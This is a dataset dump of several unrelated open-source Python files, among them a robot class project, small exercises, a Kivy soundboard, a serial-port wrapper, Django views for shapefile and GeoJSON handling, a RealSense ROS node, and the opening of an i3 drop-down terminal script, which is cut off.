+{"seq_id":"161197172","text":"\"\"\"\n Capstone Project. Code written by Antonio Juric.\n Fall term, 2018-2019.\n\"\"\"\n# \"\"\"\n# Make a robot project that makes a GUI, allows you to roll a dice with a number of sides between 2 given numbers\n# The robot then draws a polygon with that amount of sides, constantly checking to make sure it will not run into\n# anything.\n#\n# It also says the number of sides it is going to draw, and counts as it starts the sides\n# \"\"\"\nimport rosebotics_new as rb\nimport ev3dev.ev3 as ev3\n# import tkinter\n# from tkinter import ttk\n\n\ndef main():\n \"\"\" Runs YOUR specific part of the project \"\"\"\n # sensor = rb.ColorSensor()\n # print('Okay')\n # print(sensor.get_color())\n # print('REEEEEEEEEEEEEEEEE')\n # follow_circle()\n print('Main Started')\n no_touch()\n print('Main finished')\n # buttons_go()\n\n\ndef follow_circle():\n robot = rb.Snatch3rRobot()\n while True:\n robot.drive_system.start_moving(50, 50)\n robot.color_sensor.wait_until_color_is(6)\n robot.drive_system.turn_degrees(10)\n\n\ndef no_touch():\n robot = rb.Snatch3rRobot()\n print('Ready')\n while True:\n print(robot.proximity_sensor.get_distance_to_nearest_object_in_inches())\n if robot.proximity_sensor.get_distance_to_nearest_object_in_inches() <= 12:\n ev3.Sound.beep().wait(0.5)\n ev3.Sound.beep().wait(0.5)\n ev3.Sound.beep().wait(0.5)\n # ev3.Sound.speak('Reeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee')\n break\n print('Yay')\n#\n#\n# def buttons_go():\n# root = tkinter.Tk()\n# root.title('Robot Beep Boop')\n# frame = ttk.Frame(root, padding=30)\n# frame.grid()\n#\n# button = ttk.Button(frame, width=30, text='Start Controlling the Robot')\n# button.grid()\n# button['command'] = (lambda: 'oof')\n#\n# root.mainloop()\n\n\nmain()\n","sub_path":"src/Antonio.py","file_name":"Antonio.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"109955515","text":"import math\nmaxSize = 0.0000\nn = int(input())\nliOfPoints = []\nfor i in range(n):\n liOfPoints.append(list(eval(\"[\"+input()+\"]\")))\nedges = []\n# [from, to, lenSquare, center]\nfor i in range(n):\n for j in range(i+1, n):\n center = [(liOfPoints[i][0] + liOfPoints[j][0])/2, (liOfPoints[i][1] + liOfPoints[j][1])/2]\n lenSquare = pow((liOfPoints[i][0] - liOfPoints[j][0]), 2) + pow((liOfPoints[i][1] - liOfPoints[j][1]), 2)\n edges.append([liOfPoints[i], liOfPoints[j], lenSquare, center])\n\nfor i in range(len(edges)):\n for j in range(i+1, len(edges)):\n line1 = edges[i]\n line2 = edges[j]\n if line1[2] != line2[2] or line1[3] != line2[3]:\n continue\n sq1 = pow((line1[0][0] - line2[0][0]), 2) + pow((line1[0][1] - line2[0][1]), 2)\n sq2 = pow((line1[0][0] - line2[1][0]), 2) + pow((line1[0][1] - line2[1][1]), 2)\n maxSize = max(maxSize, sq1*sq2)\n\nprint(\"%.4d\" % math.sqrt(maxSize))","sub_path":"Code/CodeRecords/2330/60605/252240.py","file_name":"252240.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"481431030","text":"import time\nimport random\nfrom random import seed\nfrom random import randint\n\nfrom kivent_core.gameworld import GameWorld\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen, CardTransition, WipeTransition\nfrom kivy.core.window import Window\nfrom kivy.clock import Clock\nfrom kivy.properties import StringProperty, NumericProperty, ObjectProperty\nfrom kivy.utils import platform\nfrom kivy.animation import Animation\nfrom kivent_core.systems.gamesystem import GameSystem\nfrom kivent_core.managers.resource_managers import texture_manager\nfrom kivy.uix.widget import Widget\nfrom kivy.lang import Builder\nimport kivent_core\n\nWindow.softinput_mode = 'below_target'\nWindow.keyboard_anim_args = {'d': 0.125, 't': 'in_out_quart'}\n\n\nthreadshell = ObjectProperty(None)\ntexture_manager.load_atlas('/home/whatnoww/Desktop/Configurable-Soundboard/png/assets.atlas')\n\n\nclass Principal(Screen):\n\n greenshell = ObjectProperty(None)\n redshell = ObjectProperty(None)\n redyx = NumericProperty(0)\n redyy = NumericProperty(0)\n greenx = NumericProperty(0)\n greeny = NumericProperty(0)\n backdropsrc = ObjectProperty(None)\n animtime = NumericProperty(99)\n backdropsource = ObjectProperty(None)\n layer1posx = NumericProperty(0.5)\n layer1posy = NumericProperty(0)\n layer2posx = NumericProperty(0)\n layer2posy = NumericProperty(0)\n stoploop = 0\n\n def __init__(self, **kwargs):\n super(Principal, self).__init__(**kwargs)\n self.gameworld.init_gameworld(\n ['renderer', 'position', 'rotate', 'color', 'scale'],\n callback=self.init_game)\n\n def init_game(self):\n self.setup_states()\n self.set_state()\n self.draw_objects()\n self.load_models()\n #self.assign_custom_ID()\n #self.using_basic_systems()\n\n def draw_objects(self):\n init_entity = self.gameworld.init_entity\n\n dict = {'renderer': {'texture': 'backdrop', 'render': True},\n 'position': (0, 0),\n 'rotate': 0,\n 'scale': 1,\n 'color': (255,255,255,255),\n }\n component_order = ['position', 'rotate', 'scale', 'color', 'renderer']\n background = init_entity(dict, component_order)\n\n print(self.gameworld.entities[background].entity_id)\n\n def setup_states(self):\n self.gameworld.add_state(state_name='main',\n systems_added=['renderer', 'position', 'rotate', 'color', 'scale'],\n systems_removed=[], systems_paused=[],\n systems_unpaused=['renderer'],\n screenmanager_screen='main')\n\n def load_models(self):\n model_manager = self.gameworld.model_manager\n model_manager.load_textured_rectangle('vertex_format_4f', 7., 7.,\n 'redshell', 'star1-4')\n model_manager.load_textured_rectangle('vertex_format_4f', 10., 10.,\n 'greenshell', 'star1-4-2')\n\n def set_state(self):\n self.gameworld.state = 'main'\n\n def on_pre_enter(self, *args):\n if wm.has_screen(\"setting\") is False:\n screen = Setting(name=\"setting\")\n wm.add_widget(screen)\n import datetime\n d = datetime.date.today()\n month = int(d.strftime('%m'))\n if month == 11:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 12:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 1:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 2:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n\n def on_enter(self, *args):\n l1 = Animation(layer1posx=0.8, layer1posy=1.5, duration=20)\n l2 = Animation(layer2posx=1, layer2posy=2, duration=20)\n l1 += Animation(layer1posx=1, layer1posy=-0.5, duration=0)\n l2 += Animation(layer2posx=1, layer2posy=-2, duration=0)\n l1 += Animation(layer1posx=0.3, layer1posy=1.5, duration=20)\n l2 += Animation(layer2posx=0, layer2posy=3, duration=20)\n l1 += Animation(layer1posx=0, layer1posy=-0.5, duration=0)\n l2 += Animation(layer2posx=0, layer2posy=-2, duration=0)\n l1.repeat = True\n l2.repeat = True\n l1.start(self)\n l2.start(self)\n Principal.stoploop = 0\n import threading\n t1 = threading.Thread(target=self.shells)\n t1.start()\n\n def on_leave(self, *args):\n Animation.cancel_all(self)\n Principal.stoploop = 1\n\n def shells(self, *args):\n if Principal.stoploop == 0:\n seed(time.time())\n valuexx1 = float(random.uniform(-0.2, 0))\n valuexx0 = float(random.uniform(1, 1.2))\n valueyy1 = float(random.uniform(-0.2, 0))\n valueyy0 = float(random.uniform(1, 1.2))\n valuex = float(random.uniform(-0.5, 1.5))\n valuey = float(random.uniform(-0.5, 1.5))\n resultx = 'valuexx' + str(int(valuex))\n resulty = 'valueyy' + str(int(valuey))\n redanim = Animation(redyx=(valuex), redyy=(valuey), duration=5)\n redanim.repeat = False\n greenanim = Animation(greenx=eval(resultx), greeny=eval(resulty), duration=5)\n greenanim.repeat = False\n redanim.start(self)\n greenanim.start(self)\n Clock.schedule_once(self.shells, 5)\n\n def play(self, directory, num):\n from kivy.core.audio import SoundLoader\n print(time.time())\n seed(time.time())\n # Good Times\n if num == 1:\n value = randint(1, 12)\n # Bad times\n if num == 2:\n value = randint(1, 7)\n # Item fruitbowl\n if num == 3:\n value = randint(1, 12)\n # Catchphrase\n if num == 4:\n value = randint(1, 13)\n # Oh baby!\n if num == 5:\n value = randint(1, 2)\n # Disbelief\n if num == 6:\n value = randint(1, 7)\n # Suprise\n if num == 7:\n value = randint(1, 3)\n # Let's go!\n if num == 8:\n value = randint(1, 5)\n # Wow!\n if num == 9:\n value = randint(1, 2)\n # Hey Troy!\n if num == 10:\n value = randint(1, 4)\n # Laugh\n if num == 11:\n value = randint(1, 5)\n # Random Noises\n if num == 12:\n value = randint(1, 3)\n # Random Frases\n if num == 13:\n value = randint(1, 4)\n # Bam! Shock Dodge!\n if num == 14:\n value = randint(1, 1)\n\n sound = SoundLoader.load(directory + str(value) + '.wav')\n if sound:\n leng = sound.length\n duration = float(leng)\n sound.play()\n\n def settings(self):\n wm.transition = CardTransition()\n wm.transition.direction = \"left\"\n wm.current = \"setting\"\n\n\nclass DebugPanel(Widget):\n fps = StringProperty(None)\n\n def __init__(self, **kwargs):\n super(DebugPanel, self).__init__(**kwargs)\n Clock.schedule_once(self.update_fps)\n\n def update_fps(self,dt):\n self.fps = str(int(Clock.get_fps()))\n Clock.schedule_once(self.update_fps, .05)\n\n\n\nclass Setting(Screen):\n\n def youtube(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.youtube.com/Nmeade\")\n\n def twitch(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.twitch.tv/Nmeade\")\n\n def twitter(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://twitter.com/nmeade\")\n\n def instagram(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.instagram.com/nmeade5/\")\n\n def git(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://github.com/Whatnoww/Configurable-Soundboard\")\n\n\nclass WindowManager(ScreenManager):\n def __init__(self, **kwargs):\n super(WindowManager, self).__init__(**kwargs)\n Window.bind(on_keyboard=self.backpress)\n\n def backpress(self, window, key, *args):\n if key == 27:\n if self.current_screen.name == \"principal\":\n return False\n elif self.current_screen.name == \"setting\":\n wm.transition.direction = 'right'\n wm.current = \"principal\"\n return True\n\n\ndef loadapp(*args):\n screens = [Principal(name=\"principal\")]\n for screen in screens:\n wm.add_widget(screen)\n wm.transition = WipeTransition()\n Clock.schedule_once(homescreen, 4)\n\n\ndef homescreen(*args):\n wm.current = 'principal'\n\n\nclass Loader(Screen):\n float = ObjectProperty(None)\n\n def on_enter(self, *args):\n print('on enter fired')\n anim = Animation(backdrop=(0.2, 0.2, 0.7, 1), duration=1)\n anim += Animation(sizing=(5000, 5000), posing=(2375), duration=1)\n anim += Animation(imgvis=(1, 1, 1, 1), imgsize=(1, 1), duration=1)\n anim.start(self)\n Clock.schedule_once(loadapp, 0)\n Builder.unload_file('startup.kv')\n\n\nfrom kivy.lang import Builder\n\nBuilder.load_file('startup.kv')\nwm = WindowManager()\nwm.add_widget(Loader(name=\"loader\"))\n\n\nclass Primary(App):\n\n def build(self):\n return wm\n\n def on_enter(self):\n if platform == \"android\":\n Clock.schedule_once(self.remove_android_splash)\n\n def remove_android_splash(self, *args):\n from jnius import autoclass\n activity = autoclass('org.kivy.android.PythonActivity').mActivity\n activity.removeLoadingScreen()\n from android import hide_loading_screen\n hide_loading_screen()\n\n def on_pause(self, *args):\n Animation.cancel_all(Principal)\n Principal.stoploop = 1\n return True\n\n def on_resume(self, *args):\n pass\n\n\nif __name__ == \"__main__\":\n Primary().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"296930245","text":"from dataxmissionprotocol import Parser\nfrom serial import serial_for_url\nfrom serial.serialutil import SerialException, portNotOpenError\n\nclass SerialPort:\n __debugRead = False\n __debugWrite = False\n __port = None\n __errorProcessor = lambda e: e\n \n @staticmethod\n def close():\n if SerialPort.__port and SerialPort.__port.isOpen():\n SerialPort.__port.close()\n SerialPort.__port = None\n \n @staticmethod\n def getPacketType():\n return SerialPort.__packetType\n \n @staticmethod\n def open(path, **kw):\n SerialPort.close()\n \n try:\n SerialPort.__port = serial_for_url(path, **kw)\n \n return True\n \n except SerialException as e:\n SerialPort.__errorProcessor(e)\n \n @staticmethod\n def read(size):\n try:\n if not SerialPort.__port:\n raise portNotOpenError\n \n size = SerialPort.__packetType.getFormat().getTotalPacketSize(size)\n \n if SerialPort.__debugRead:\n print(f\"reading {size} bytes...\")\n \n buf = SerialPort.__port.read(size)\n \n if SerialPort.__debugRead:\n print(\"bytes read:\", list(buf))\n \n return SerialPort.__parser.parse(buf)\n \n except SerialException as e:\n SerialPort.__errorProcessor(e)\n \n @staticmethod\n def setDebug(debugRead = False, debugWrite = False):\n SerialPort.__debugRead = debugRead\n SerialPort.__debugWrite = debugWrite\n \n @staticmethod\n def setErrorProcessor(processor):\n SerialPort.__errorProcessor = processor\n \n @staticmethod\n def setPacketType(packetType):\n SerialPort.__packetType = packetType\n SerialPort.__parser = Parser(packetType.getFormat())\n \n @staticmethod\n def write(**kw):\n throw = kw.pop(\"throw\", False)\n \n return SerialPort.writePacket(SerialPort.__packetType(**kw), throw)\n \n @staticmethod\n def writePacket(packet, throw = False):\n if SerialPort.__debugWrite:\n print(list(packet.rawBuffer))\n return True\n \n try:\n if not SerialPort.__port:\n raise portNotOpenError\n \n SerialPort.__port.write(packet.rawBuffer)\n \n return True\n \n except SerialException as e:\n if throw:\n raise\n \n SerialPort.__errorProcessor(e)\n","sub_path":"commonutils/serialport.py","file_name":"serialport.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"558062022","text":"quantity, price = map(lambda x: int(x), input().split())\ncheque = []\nfor i in range(quantity):\n cheque_position = input()\n price_per_item, quantity, total_price = cheque_position.split()\n quantity = quantity[1:]\n total_price = total_price[1:]\n cheque.append({'price_per_item': int(price_per_item),\n 'quantity': int(quantity),\n 'total_price': int(total_price),\n 'id': i + 1})\nprice_in_cheque = (sum(item['total_price'] for item in cheque))\nprint(price - price_in_cheque)\nif price_in_cheque != price:\n for item in cheque:\n print(item['id']) if item['price_per_item'] * item['quantity'] != item['total_price'] else None","sub_path":"lab2/12.2.py","file_name":"12.2.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"595726636","text":"from AHP import G1\r\nfrom entropy import entropy\r\nfrom Evaluation import fuzzy\r\nimport pandas as pd\r\nimport numpy as np\r\npd.set_option('display.width',200)\r\nif __name__ == \"__main__\":\r\n # -----------数据引入-------------\r\n G1_array = pd.read_csv(\"TJU-LD-G1.csv\")\r\n Entropy_array = pd.read_csv(\"TJU-LD-Entropy.csv\")\r\n Fuzzy_array1 = pd.read_csv(\"TJU-LD-Fuzzy1.csv\")\r\n Fuzzy_array2 = pd.read_csv(\"TJU-LD-Fuzzy2.csv\")\r\n Fuzzy_array3 = pd.read_csv(\"TJU-LD-Fuzzy3.csv\")\r\n Fuzzy_array4 = pd.read_csv(\"TJU-LD-Fuzzy4.csv\")\r\n Fuzzy_array5 = pd.read_csv(\"TJU-LD-Fuzzy5.csv\")\r\n Fuzzy_array6 = pd.read_csv(\"TJU-LD-Fuzzy6.csv\")\r\n\r\n # -----------数据处理-------------\r\n # -------------G1----------------\r\n G1_label = list(G1_array.columns)\r\n G1_sort1 = np.array(G1_array.iloc[0])\r\n G1_iptc1 = np.array(G1_array.iloc[1].dropna(how='all'))\r\n G1_sort2 = np.array(G1_array.iloc[2])\r\n G1_iptc2 = np.array(G1_array.iloc[3].dropna(how='all'))\r\n G1_sort3 = np.array(G1_array.iloc[4])\r\n G1_iptc3 = np.array(G1_array.iloc[5].dropna(how='all'))\r\n G1_sort4 = np.array(G1_array.iloc[6])\r\n G1_iptc4 = np.array(G1_array.iloc[7].dropna(how='all'))\r\n G1_sort5 = np.array(G1_array.iloc[8])\r\n G1_iptc5 = np.array(G1_array.iloc[9].dropna(how='all'))\r\n G1_sort6 = np.array(G1_array.iloc[10])\r\n G1_iptc6 = np.array(G1_array.iloc[11].dropna(how='all'))\r\n\r\n # ------------Entropy-------------\r\n ent = np.array(Entropy_array).T\r\n\r\n # ------------Fuzzy---------------\r\n F_arr1 = np.array(Fuzzy_array1.iloc[0:12])\r\n F_scr1 = np.array(Fuzzy_array1.iloc[12])\r\n F_arr2 = np.array(Fuzzy_array2.iloc[0:12])\r\n F_scr2 = np.array(Fuzzy_array2.iloc[12])\r\n F_arr3 = np.array(Fuzzy_array3.iloc[0:12])\r\n F_scr3 = np.array(Fuzzy_array3.iloc[12])\r\n F_arr4 = np.array(Fuzzy_array4.iloc[0:12])\r\n F_scr4 = np.array(Fuzzy_array4.iloc[12])\r\n F_arr5 = np.array(Fuzzy_array5.iloc[0:12])\r\n F_scr5 = np.array(Fuzzy_array5.iloc[12])\r\n F_arr6 = np.array(Fuzzy_array6.iloc[0:12])\r\n F_scr6 = np.array(Fuzzy_array6.iloc[12])\r\n\r\n # ------------计算G1---------------\r\n subj_weight = []\r\n for i in range(1,7):\r\n print(\"G1法——专家{}\".format(i))\r\n gg = G1(eval('G1_iptc'+str(i)), ['Ip'+str(j) for j in range(1, 13)], eval('G1_sort'+str(i)))\r\n gg.construct().describe()\r\n subj_weight.append(gg.weight)\r\n subj_weight = np.array(subj_weight)\r\n subject = np.mean(subj_weight, axis=0)\r\n # ------------计算Entropy---------------\r\n e, object = entropy(ent)\r\n\r\n # ------------综合权重---------------\r\n w_fin = 0.6*subject+0.4*object\r\n print(\"综合权重为:\")\r\n print(w_fin)\r\n\r\n # ------------综合评价---------------\r\n cons = []\r\n for i in range(1,7):\r\n fuzz = fuzzy(eval('F_arr'+str(i)), w_fin, eval('F_scr'+str(i)), name=\"专家\"+str(i))\r\n fuzz.construct().describe()\r\n cons.append(fuzz.consequence)\r\n fin_fuzzy = np.array(cons).mean()\r\n fin_init = (ent.mean(axis=1)*w_fin).sum()\r\n f = 0.6*fin_fuzzy+0.4*fin_init\r\n print(\"初步评价:{}\".format(fin_init))\r\n print(\"模糊综合评价:{}\".format(fin_fuzzy))\r\n print(\"总评价:{}\".format(f))\r\n","sub_path":"Scientific literacy/Satisfaction_Delivery.py","file_name":"Satisfaction_Delivery.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"38858070","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.contrib.gis.gdal import DataSource\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom django.forms import forms\nimport datetime\nfrom .forms import ContactForm\nfrom .directorios import Directorio\nimport os \nfrom django.http import JsonResponse\nimport json \n \ndef hellow(request, question_id):\n text = \"welcome to my app number %s!
\"% question_id\n \n return HttpResponse(text)\n\ndef hoyes(request):\n ds = DataSource(settings.MEDIA_ROOT+ '\\\\dir2\\\\LotesCatastralesBog.shp')\n layer = ds[0]\n\n # Localizacion = layer.get_fields('Location')\n # Latitud = layer.get_fields('Latitude')\n # Longitud = layer.get_fields('Longitude')\n today = layer.fields\n return render(request, \"hola.html\",{\"hoyy\":today})\n\n\ndef get_info_file(request, file, folder):\n ds = DataSource(settings.MEDIA_ROOT+'\\\\'+folder+'\\\\'+file)\n layer = ds[0]\n datat ={}\n contador = 0\n for a in layer.fields:\n datat[contador] = a\n contador +=1 \n return JsonResponse(datat) \n\ndef informacionprueba(request):\n ds = DataSource('C:\\\\SIG\\\\loadInfo\\\\myform\\\\uploads\\\\myshp\\\\national_shapefile_obs.shp')\n layer = ds[0]\n campos = {'GaugeLID','Location','Latitude','Longitude'} \n listaCampos = {}\n\n informacion = {}\n contador = 0\n return JsonResponse(layer.field_types) \n\n\n \ndef informacion(request):\n ds = DataSource(settings.MEDIA_ROOT+ '\\\\'+request.POST['directorio']+'\\\\'+request.POST['nombre'])\n layer = ds[0]\n campos = request.POST['campos'].split(',')\n listaCampos = {}\n\n informacion = {}\n for c in campos:\n listaCampos[c] = layer.get_fields(c)\n\n return JsonResponse(listaCampos) \n \ndef home(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n return redirect('/hello')\n else:\n form = ContactForm()\n return render(request, 'contacteme.html', {'form':form})\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n folder = request.POST['directorio']\n fs = FileSystemStorage()\n filename = fs.save(folder+'\\\\'+myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'simple_upload.html', {\n 'uploaded_file_url': uploaded_file_url,'directorios': get_directorios(True, settings.MEDIA_ROOT) })\n return render(request, 'simple_upload.html',{'directorios': get_directorios(True, settings.MEDIA_ROOT)})\n\ndef get_directorios(folder, dir):\n files = os.listdir(dir)\n directorios = []\n for file in files:\n if file.find('.') == -1 and folder: \n directorios.append(file)\n else:\n directorios.append(file) \n return directorios\n\ndef get_contenido_directorio(request, carpeta): \n archivos = get_directorios(False, settings.MEDIA_ROOT+'\\\\'+carpeta)\n datat ={}\n contador = 0\n for a in archivos:\n datat[contador] = a\n contador +=1 \n return JsonResponse(datat) \n\ndef process(request):\n return render(request, 'contacteme.html', {'form':''})\n\ndef read(request):\n return render(request, 'contacteme.html', {'form':''})\n\ndef list(request):\n lcompleta = []\n carpetas = get_directorios(True, settings.MEDIA_ROOT)\n for c in carpetas:\n larchi = get_directorios(False, settings.MEDIA_ROOT+'\\\\'+c)\n for shp in larchi:\n if shp.endswith('.shp'): \n newdir = Directorio(shp,c)\n lcompleta.append(newdir)\n return render(request, 'lista.html', {'archivos':lcompleta})\n\n############################################################\n##########################GEOJSON###########################\n############################################################\ndef load_gj(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n folder = 'geojson'\n fs = FileSystemStorage()\n filename = fs.save(folder+'\\\\'+myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'upload_gj.html', {\n 'uploaded_file_url': uploaded_file_url })\n return render(request, 'upload_gj.html')\n\ndef read_gj(request):\n filename = request.POST['filename']\n f = open('C:\\\\SIG\\\\loadInfo\\\\myform\\\\uploads\\\\geojson\\\\'+filename, 'r')\n obj = json.load(f)\n \n #print(datat)\n return JsonResponse(obj) \n\ndef read_properties(obj):\n propiedades ={}\n contador = 0\n for o in obj:\n propiedades[contador] = {o:obj[o]}\n contador +=1 \n return propiedades \n\ndef listgj(request):\n lcompleta = []\n carpetas = get_directorios(False, settings.MEDIA_ROOT+'\\\\geojson')\n for geoj in carpetas:\n if geoj.find('.json') != -1: \n newdir = Directorio(geoj,'')\n lcompleta.append(newdir)\n return render(request, 'listageojson.html', {'archivos':lcompleta})\n\ndef map(request):\n 'Prueba Maps'\n return render(request,'osm.html')\n\n\n\n###################INTERSECCION#############################\ndef interseccion(request):\n lcompleta = []\n carpetas = get_directorios(False, settings.MEDIA_ROOT+'\\\\geojsonI')\n for geoj in carpetas:\n if geoj.find('.json') != -1: \n newdir = Directorio(geoj,'')\n lcompleta.append(newdir)\n return render(request, 'listageojsonI.html', {'archivos':lcompleta})","sub_path":"myform/mygeo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54324677","text":"#!/usr/bin/python3.6\nimport pyrealsense2 as rs\nimport rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge, CvBridgeError\n\n# for point_cloud\nfrom sensor_msgs.msg import Image, CameraInfo\n\n# D435 pipeline\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n# Start streaming\npipeline.start(config)\n\n# Start streaming with requested config\nconfig.enable_record_to_file('test1.bag')\n\n# Align depth to color \nalign_to = rs.stream.color\nalign = rs.align(align_to)\n\n# Node init and publisher definition\nrospy.init_node('realsense_rgb_align_depth', anonymous = True)\npub_color = rospy.Publisher(\"rgb_image\", Image, queue_size=2)\npub_align = rospy.Publisher(\"align_depth\", Image, queue_size=2)\npub_camera_info = rospy.Publisher(\"camera_info\", CameraInfo, queue_size=2)\nrate = rospy.Rate(30) # 30hz\n\n# get color camera data\nprofile = pipeline.get_active_profile()\ncolor_profile = rs.video_stream_profile(profile.get_stream(rs.stream.color))\ncolor_intrinsics = color_profile.get_intrinsics()\n\ncamera_info = CameraInfo()\ncamera_info.width = color_intrinsics.width\ncamera_info.height = color_intrinsics.height\ncamera_info.distortion_model = 'plumb_bob'\ncx = color_intrinsics.ppx\ncy = color_intrinsics.ppy\nfx = color_intrinsics.fx\nfy = color_intrinsics.fy\ncamera_info.K = [fx, 0, cx, 0, fy, cy, 0, 0, 1]\ncamera_info.D = [0, 0, 0, 0, 0]\ncamera_info.R = [1.0, 0, 0, 0, 1.0, 0, 0, 0, 1.0]\ncamera_info.P = [fx, 0, cx, 0, 0, fy, cy, 0, 0, 0, 1.0, 0]\n\nbridge = CvBridge()\n\nprint(\"Start node\")\n\n\nwhile not rospy.is_shutdown():\n \n # Get data from cameras\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n\n # Publish color image\n color_image = np.asanyarray(color_frame.get_data())\n color_message = bridge.cv2_to_imgmsg(color_image, encoding=\"passthrough\")\n pub_color.publish(color_message)\n\n # Publish camera info\n pub_camera_info.publish(camera_info)\n\n # Publish align dpth to color image\n aligned_frames = align.process(frames)\n aligned_depth_frame = aligned_frames.get_depth_frame()\n align_depth = np.asanyarray(aligned_depth_frame.get_data())\n align_message = bridge.cv2_to_imgmsg(align_depth, encoding=\"passthrough\")\n pub_align.publish(align_message)\n\n rate.sleep()\n\n# Stop streaming\npipeline.stop()\n\n","sub_path":"realsense_node_python/src/realsense_rgb_align_depth.py","file_name":"realsense_rgb_align_depth.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"56180585","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\"\"\"\n i3-quickterm.py\n ===============\n\n Description: A small drop-down terminal for i3wm.\n Author: lbonn \n Creation Date: 2016-12-26\n Modification Date: 2019-04-13\n\n\"\"\"\n\nimport copy\nimport fcntl\nimport json\nimport logging\nimport os\nimport shlex\nimport subprocess\nimport sys\nfrom typing import Tuple, Union\n\nfrom contextlib import contextmanager, suppress\nfrom pathlib import Path\n\nimport click\nimport i3ipc\n\n\nDEFAULT_CONF = {\n 'menu': \"rofi -dmenu -p 'quickterm: ' -no-custom -auto-select\",\n 'term': 'urxvt',\n 'history': '{$HOME}/.cache/i3/i3-quickterm.order',\n 'ratio': 0.25,\n 'pos': 'top',\n 'shells': {\n 'haskell': 'ghci',\n 'js': 'node',\n 'python': 'ipython3 --no-banner',\n 'shell': '{$SHELL}'\n }\n}\n\n\nMARK_QT_PATTERN = 'quickterm_.*'\nMARK_QT = 'quickterm_{}'\n\n\ndef TERM(executable: str,\n execopt: str = '-e',\n execfmt: str = 'expanded',\n titleopt: Union[str, None] = '-T',\n classopt: Union[str, None] = None) -> str:\n \"\"\" Helper to declare a terminal in the hardcoded list \"\"\"\n if execfmt not in ('expanded', 'string'):\n raise RuntimeError('Invalid execfmt')\n\n if titleopt is not None:\n executable += ' ' + titleopt + ' {title}'\n\n if classopt is not None:\n executable += ' ' + classopt + ' {class_name}'\n\n return executable + ' {} {{{}}}'.format(execopt, execfmt)\n\n\nTERMS = {\n 'alacritty': TERM('alacritty', titleopt='-t'),\n 'kitty': TERM('kitty', titleopt='-T', classopt='--class'),\n 'gnome-terminal': TERM('gnome-terminal', execopt='--', titleopt=None),\n 'roxterm': TERM('roxterm'),\n 'st': TERM('st'),\n 'termite': TERM('termite', execfmt='string', titleopt='-t'),\n 'urxvt': TERM('urxvt'),\n 'urxvtc': TERM('urxvtc'),\n 'xfce4-terminal': TERM('xfce4-terminal', execfmt='string'),\n 'xterm': TERM('xterm'),\n}\n\n\ndef conf_path() -> str:\n \"\"\" Returns the path to the configuration file. \"\"\"\n home_dir = os.environ['HOME']\n xdg_dir = os.environ.get('XDG_CONFIG_DIR', '{}/.config'.format(home_dir))\n\n return xdg_dir + '/i3/i3-quickterm.json'\n\n\ndef read_conf(fn: str) -> dict:\n \"\"\" Reads the configuration file.\"\"\"\n try:\n with open(fn, 'r') as f:\n c = json.load(f)\n\n return c\n\n except Exception as e:\n logging.error('invalid config file: {}'.format(e))\n return {}\n\n\n@contextmanager\ndef get_history_file(conf: dict) -> object:\n if conf['history'] is None:\n yield None\n return\n\n p = Path(expand_command(conf['history'])[0])\n\n os.makedirs(str(p.parent), exist_ok=True)\n\n f = open(str(p), 'a+')\n fcntl.lockf(f, fcntl.LOCK_EX)\n\n try:\n f.seek(0)\n yield f\n\n finally:\n fcntl.lockf(f, fcntl.LOCK_UN)\n f.close()\n\n\ndef expand_command(cmd: str, **rplc_map) -> str:\n logging.debug('expand_cmd: \"%s\" (%s)' % (cmd, rplc_map))\n d = {'$' + k: v for k, v in os.environ.items()}\n d.update(rplc_map)\n\n return shlex.split(cmd.format(**d))\n\n\ndef i3cmd(conn: i3ipc.Connection, cmd: str) -> None:\n \"\"\" Wrapper for conn.command that logs commands prior to running. \"\"\"\n 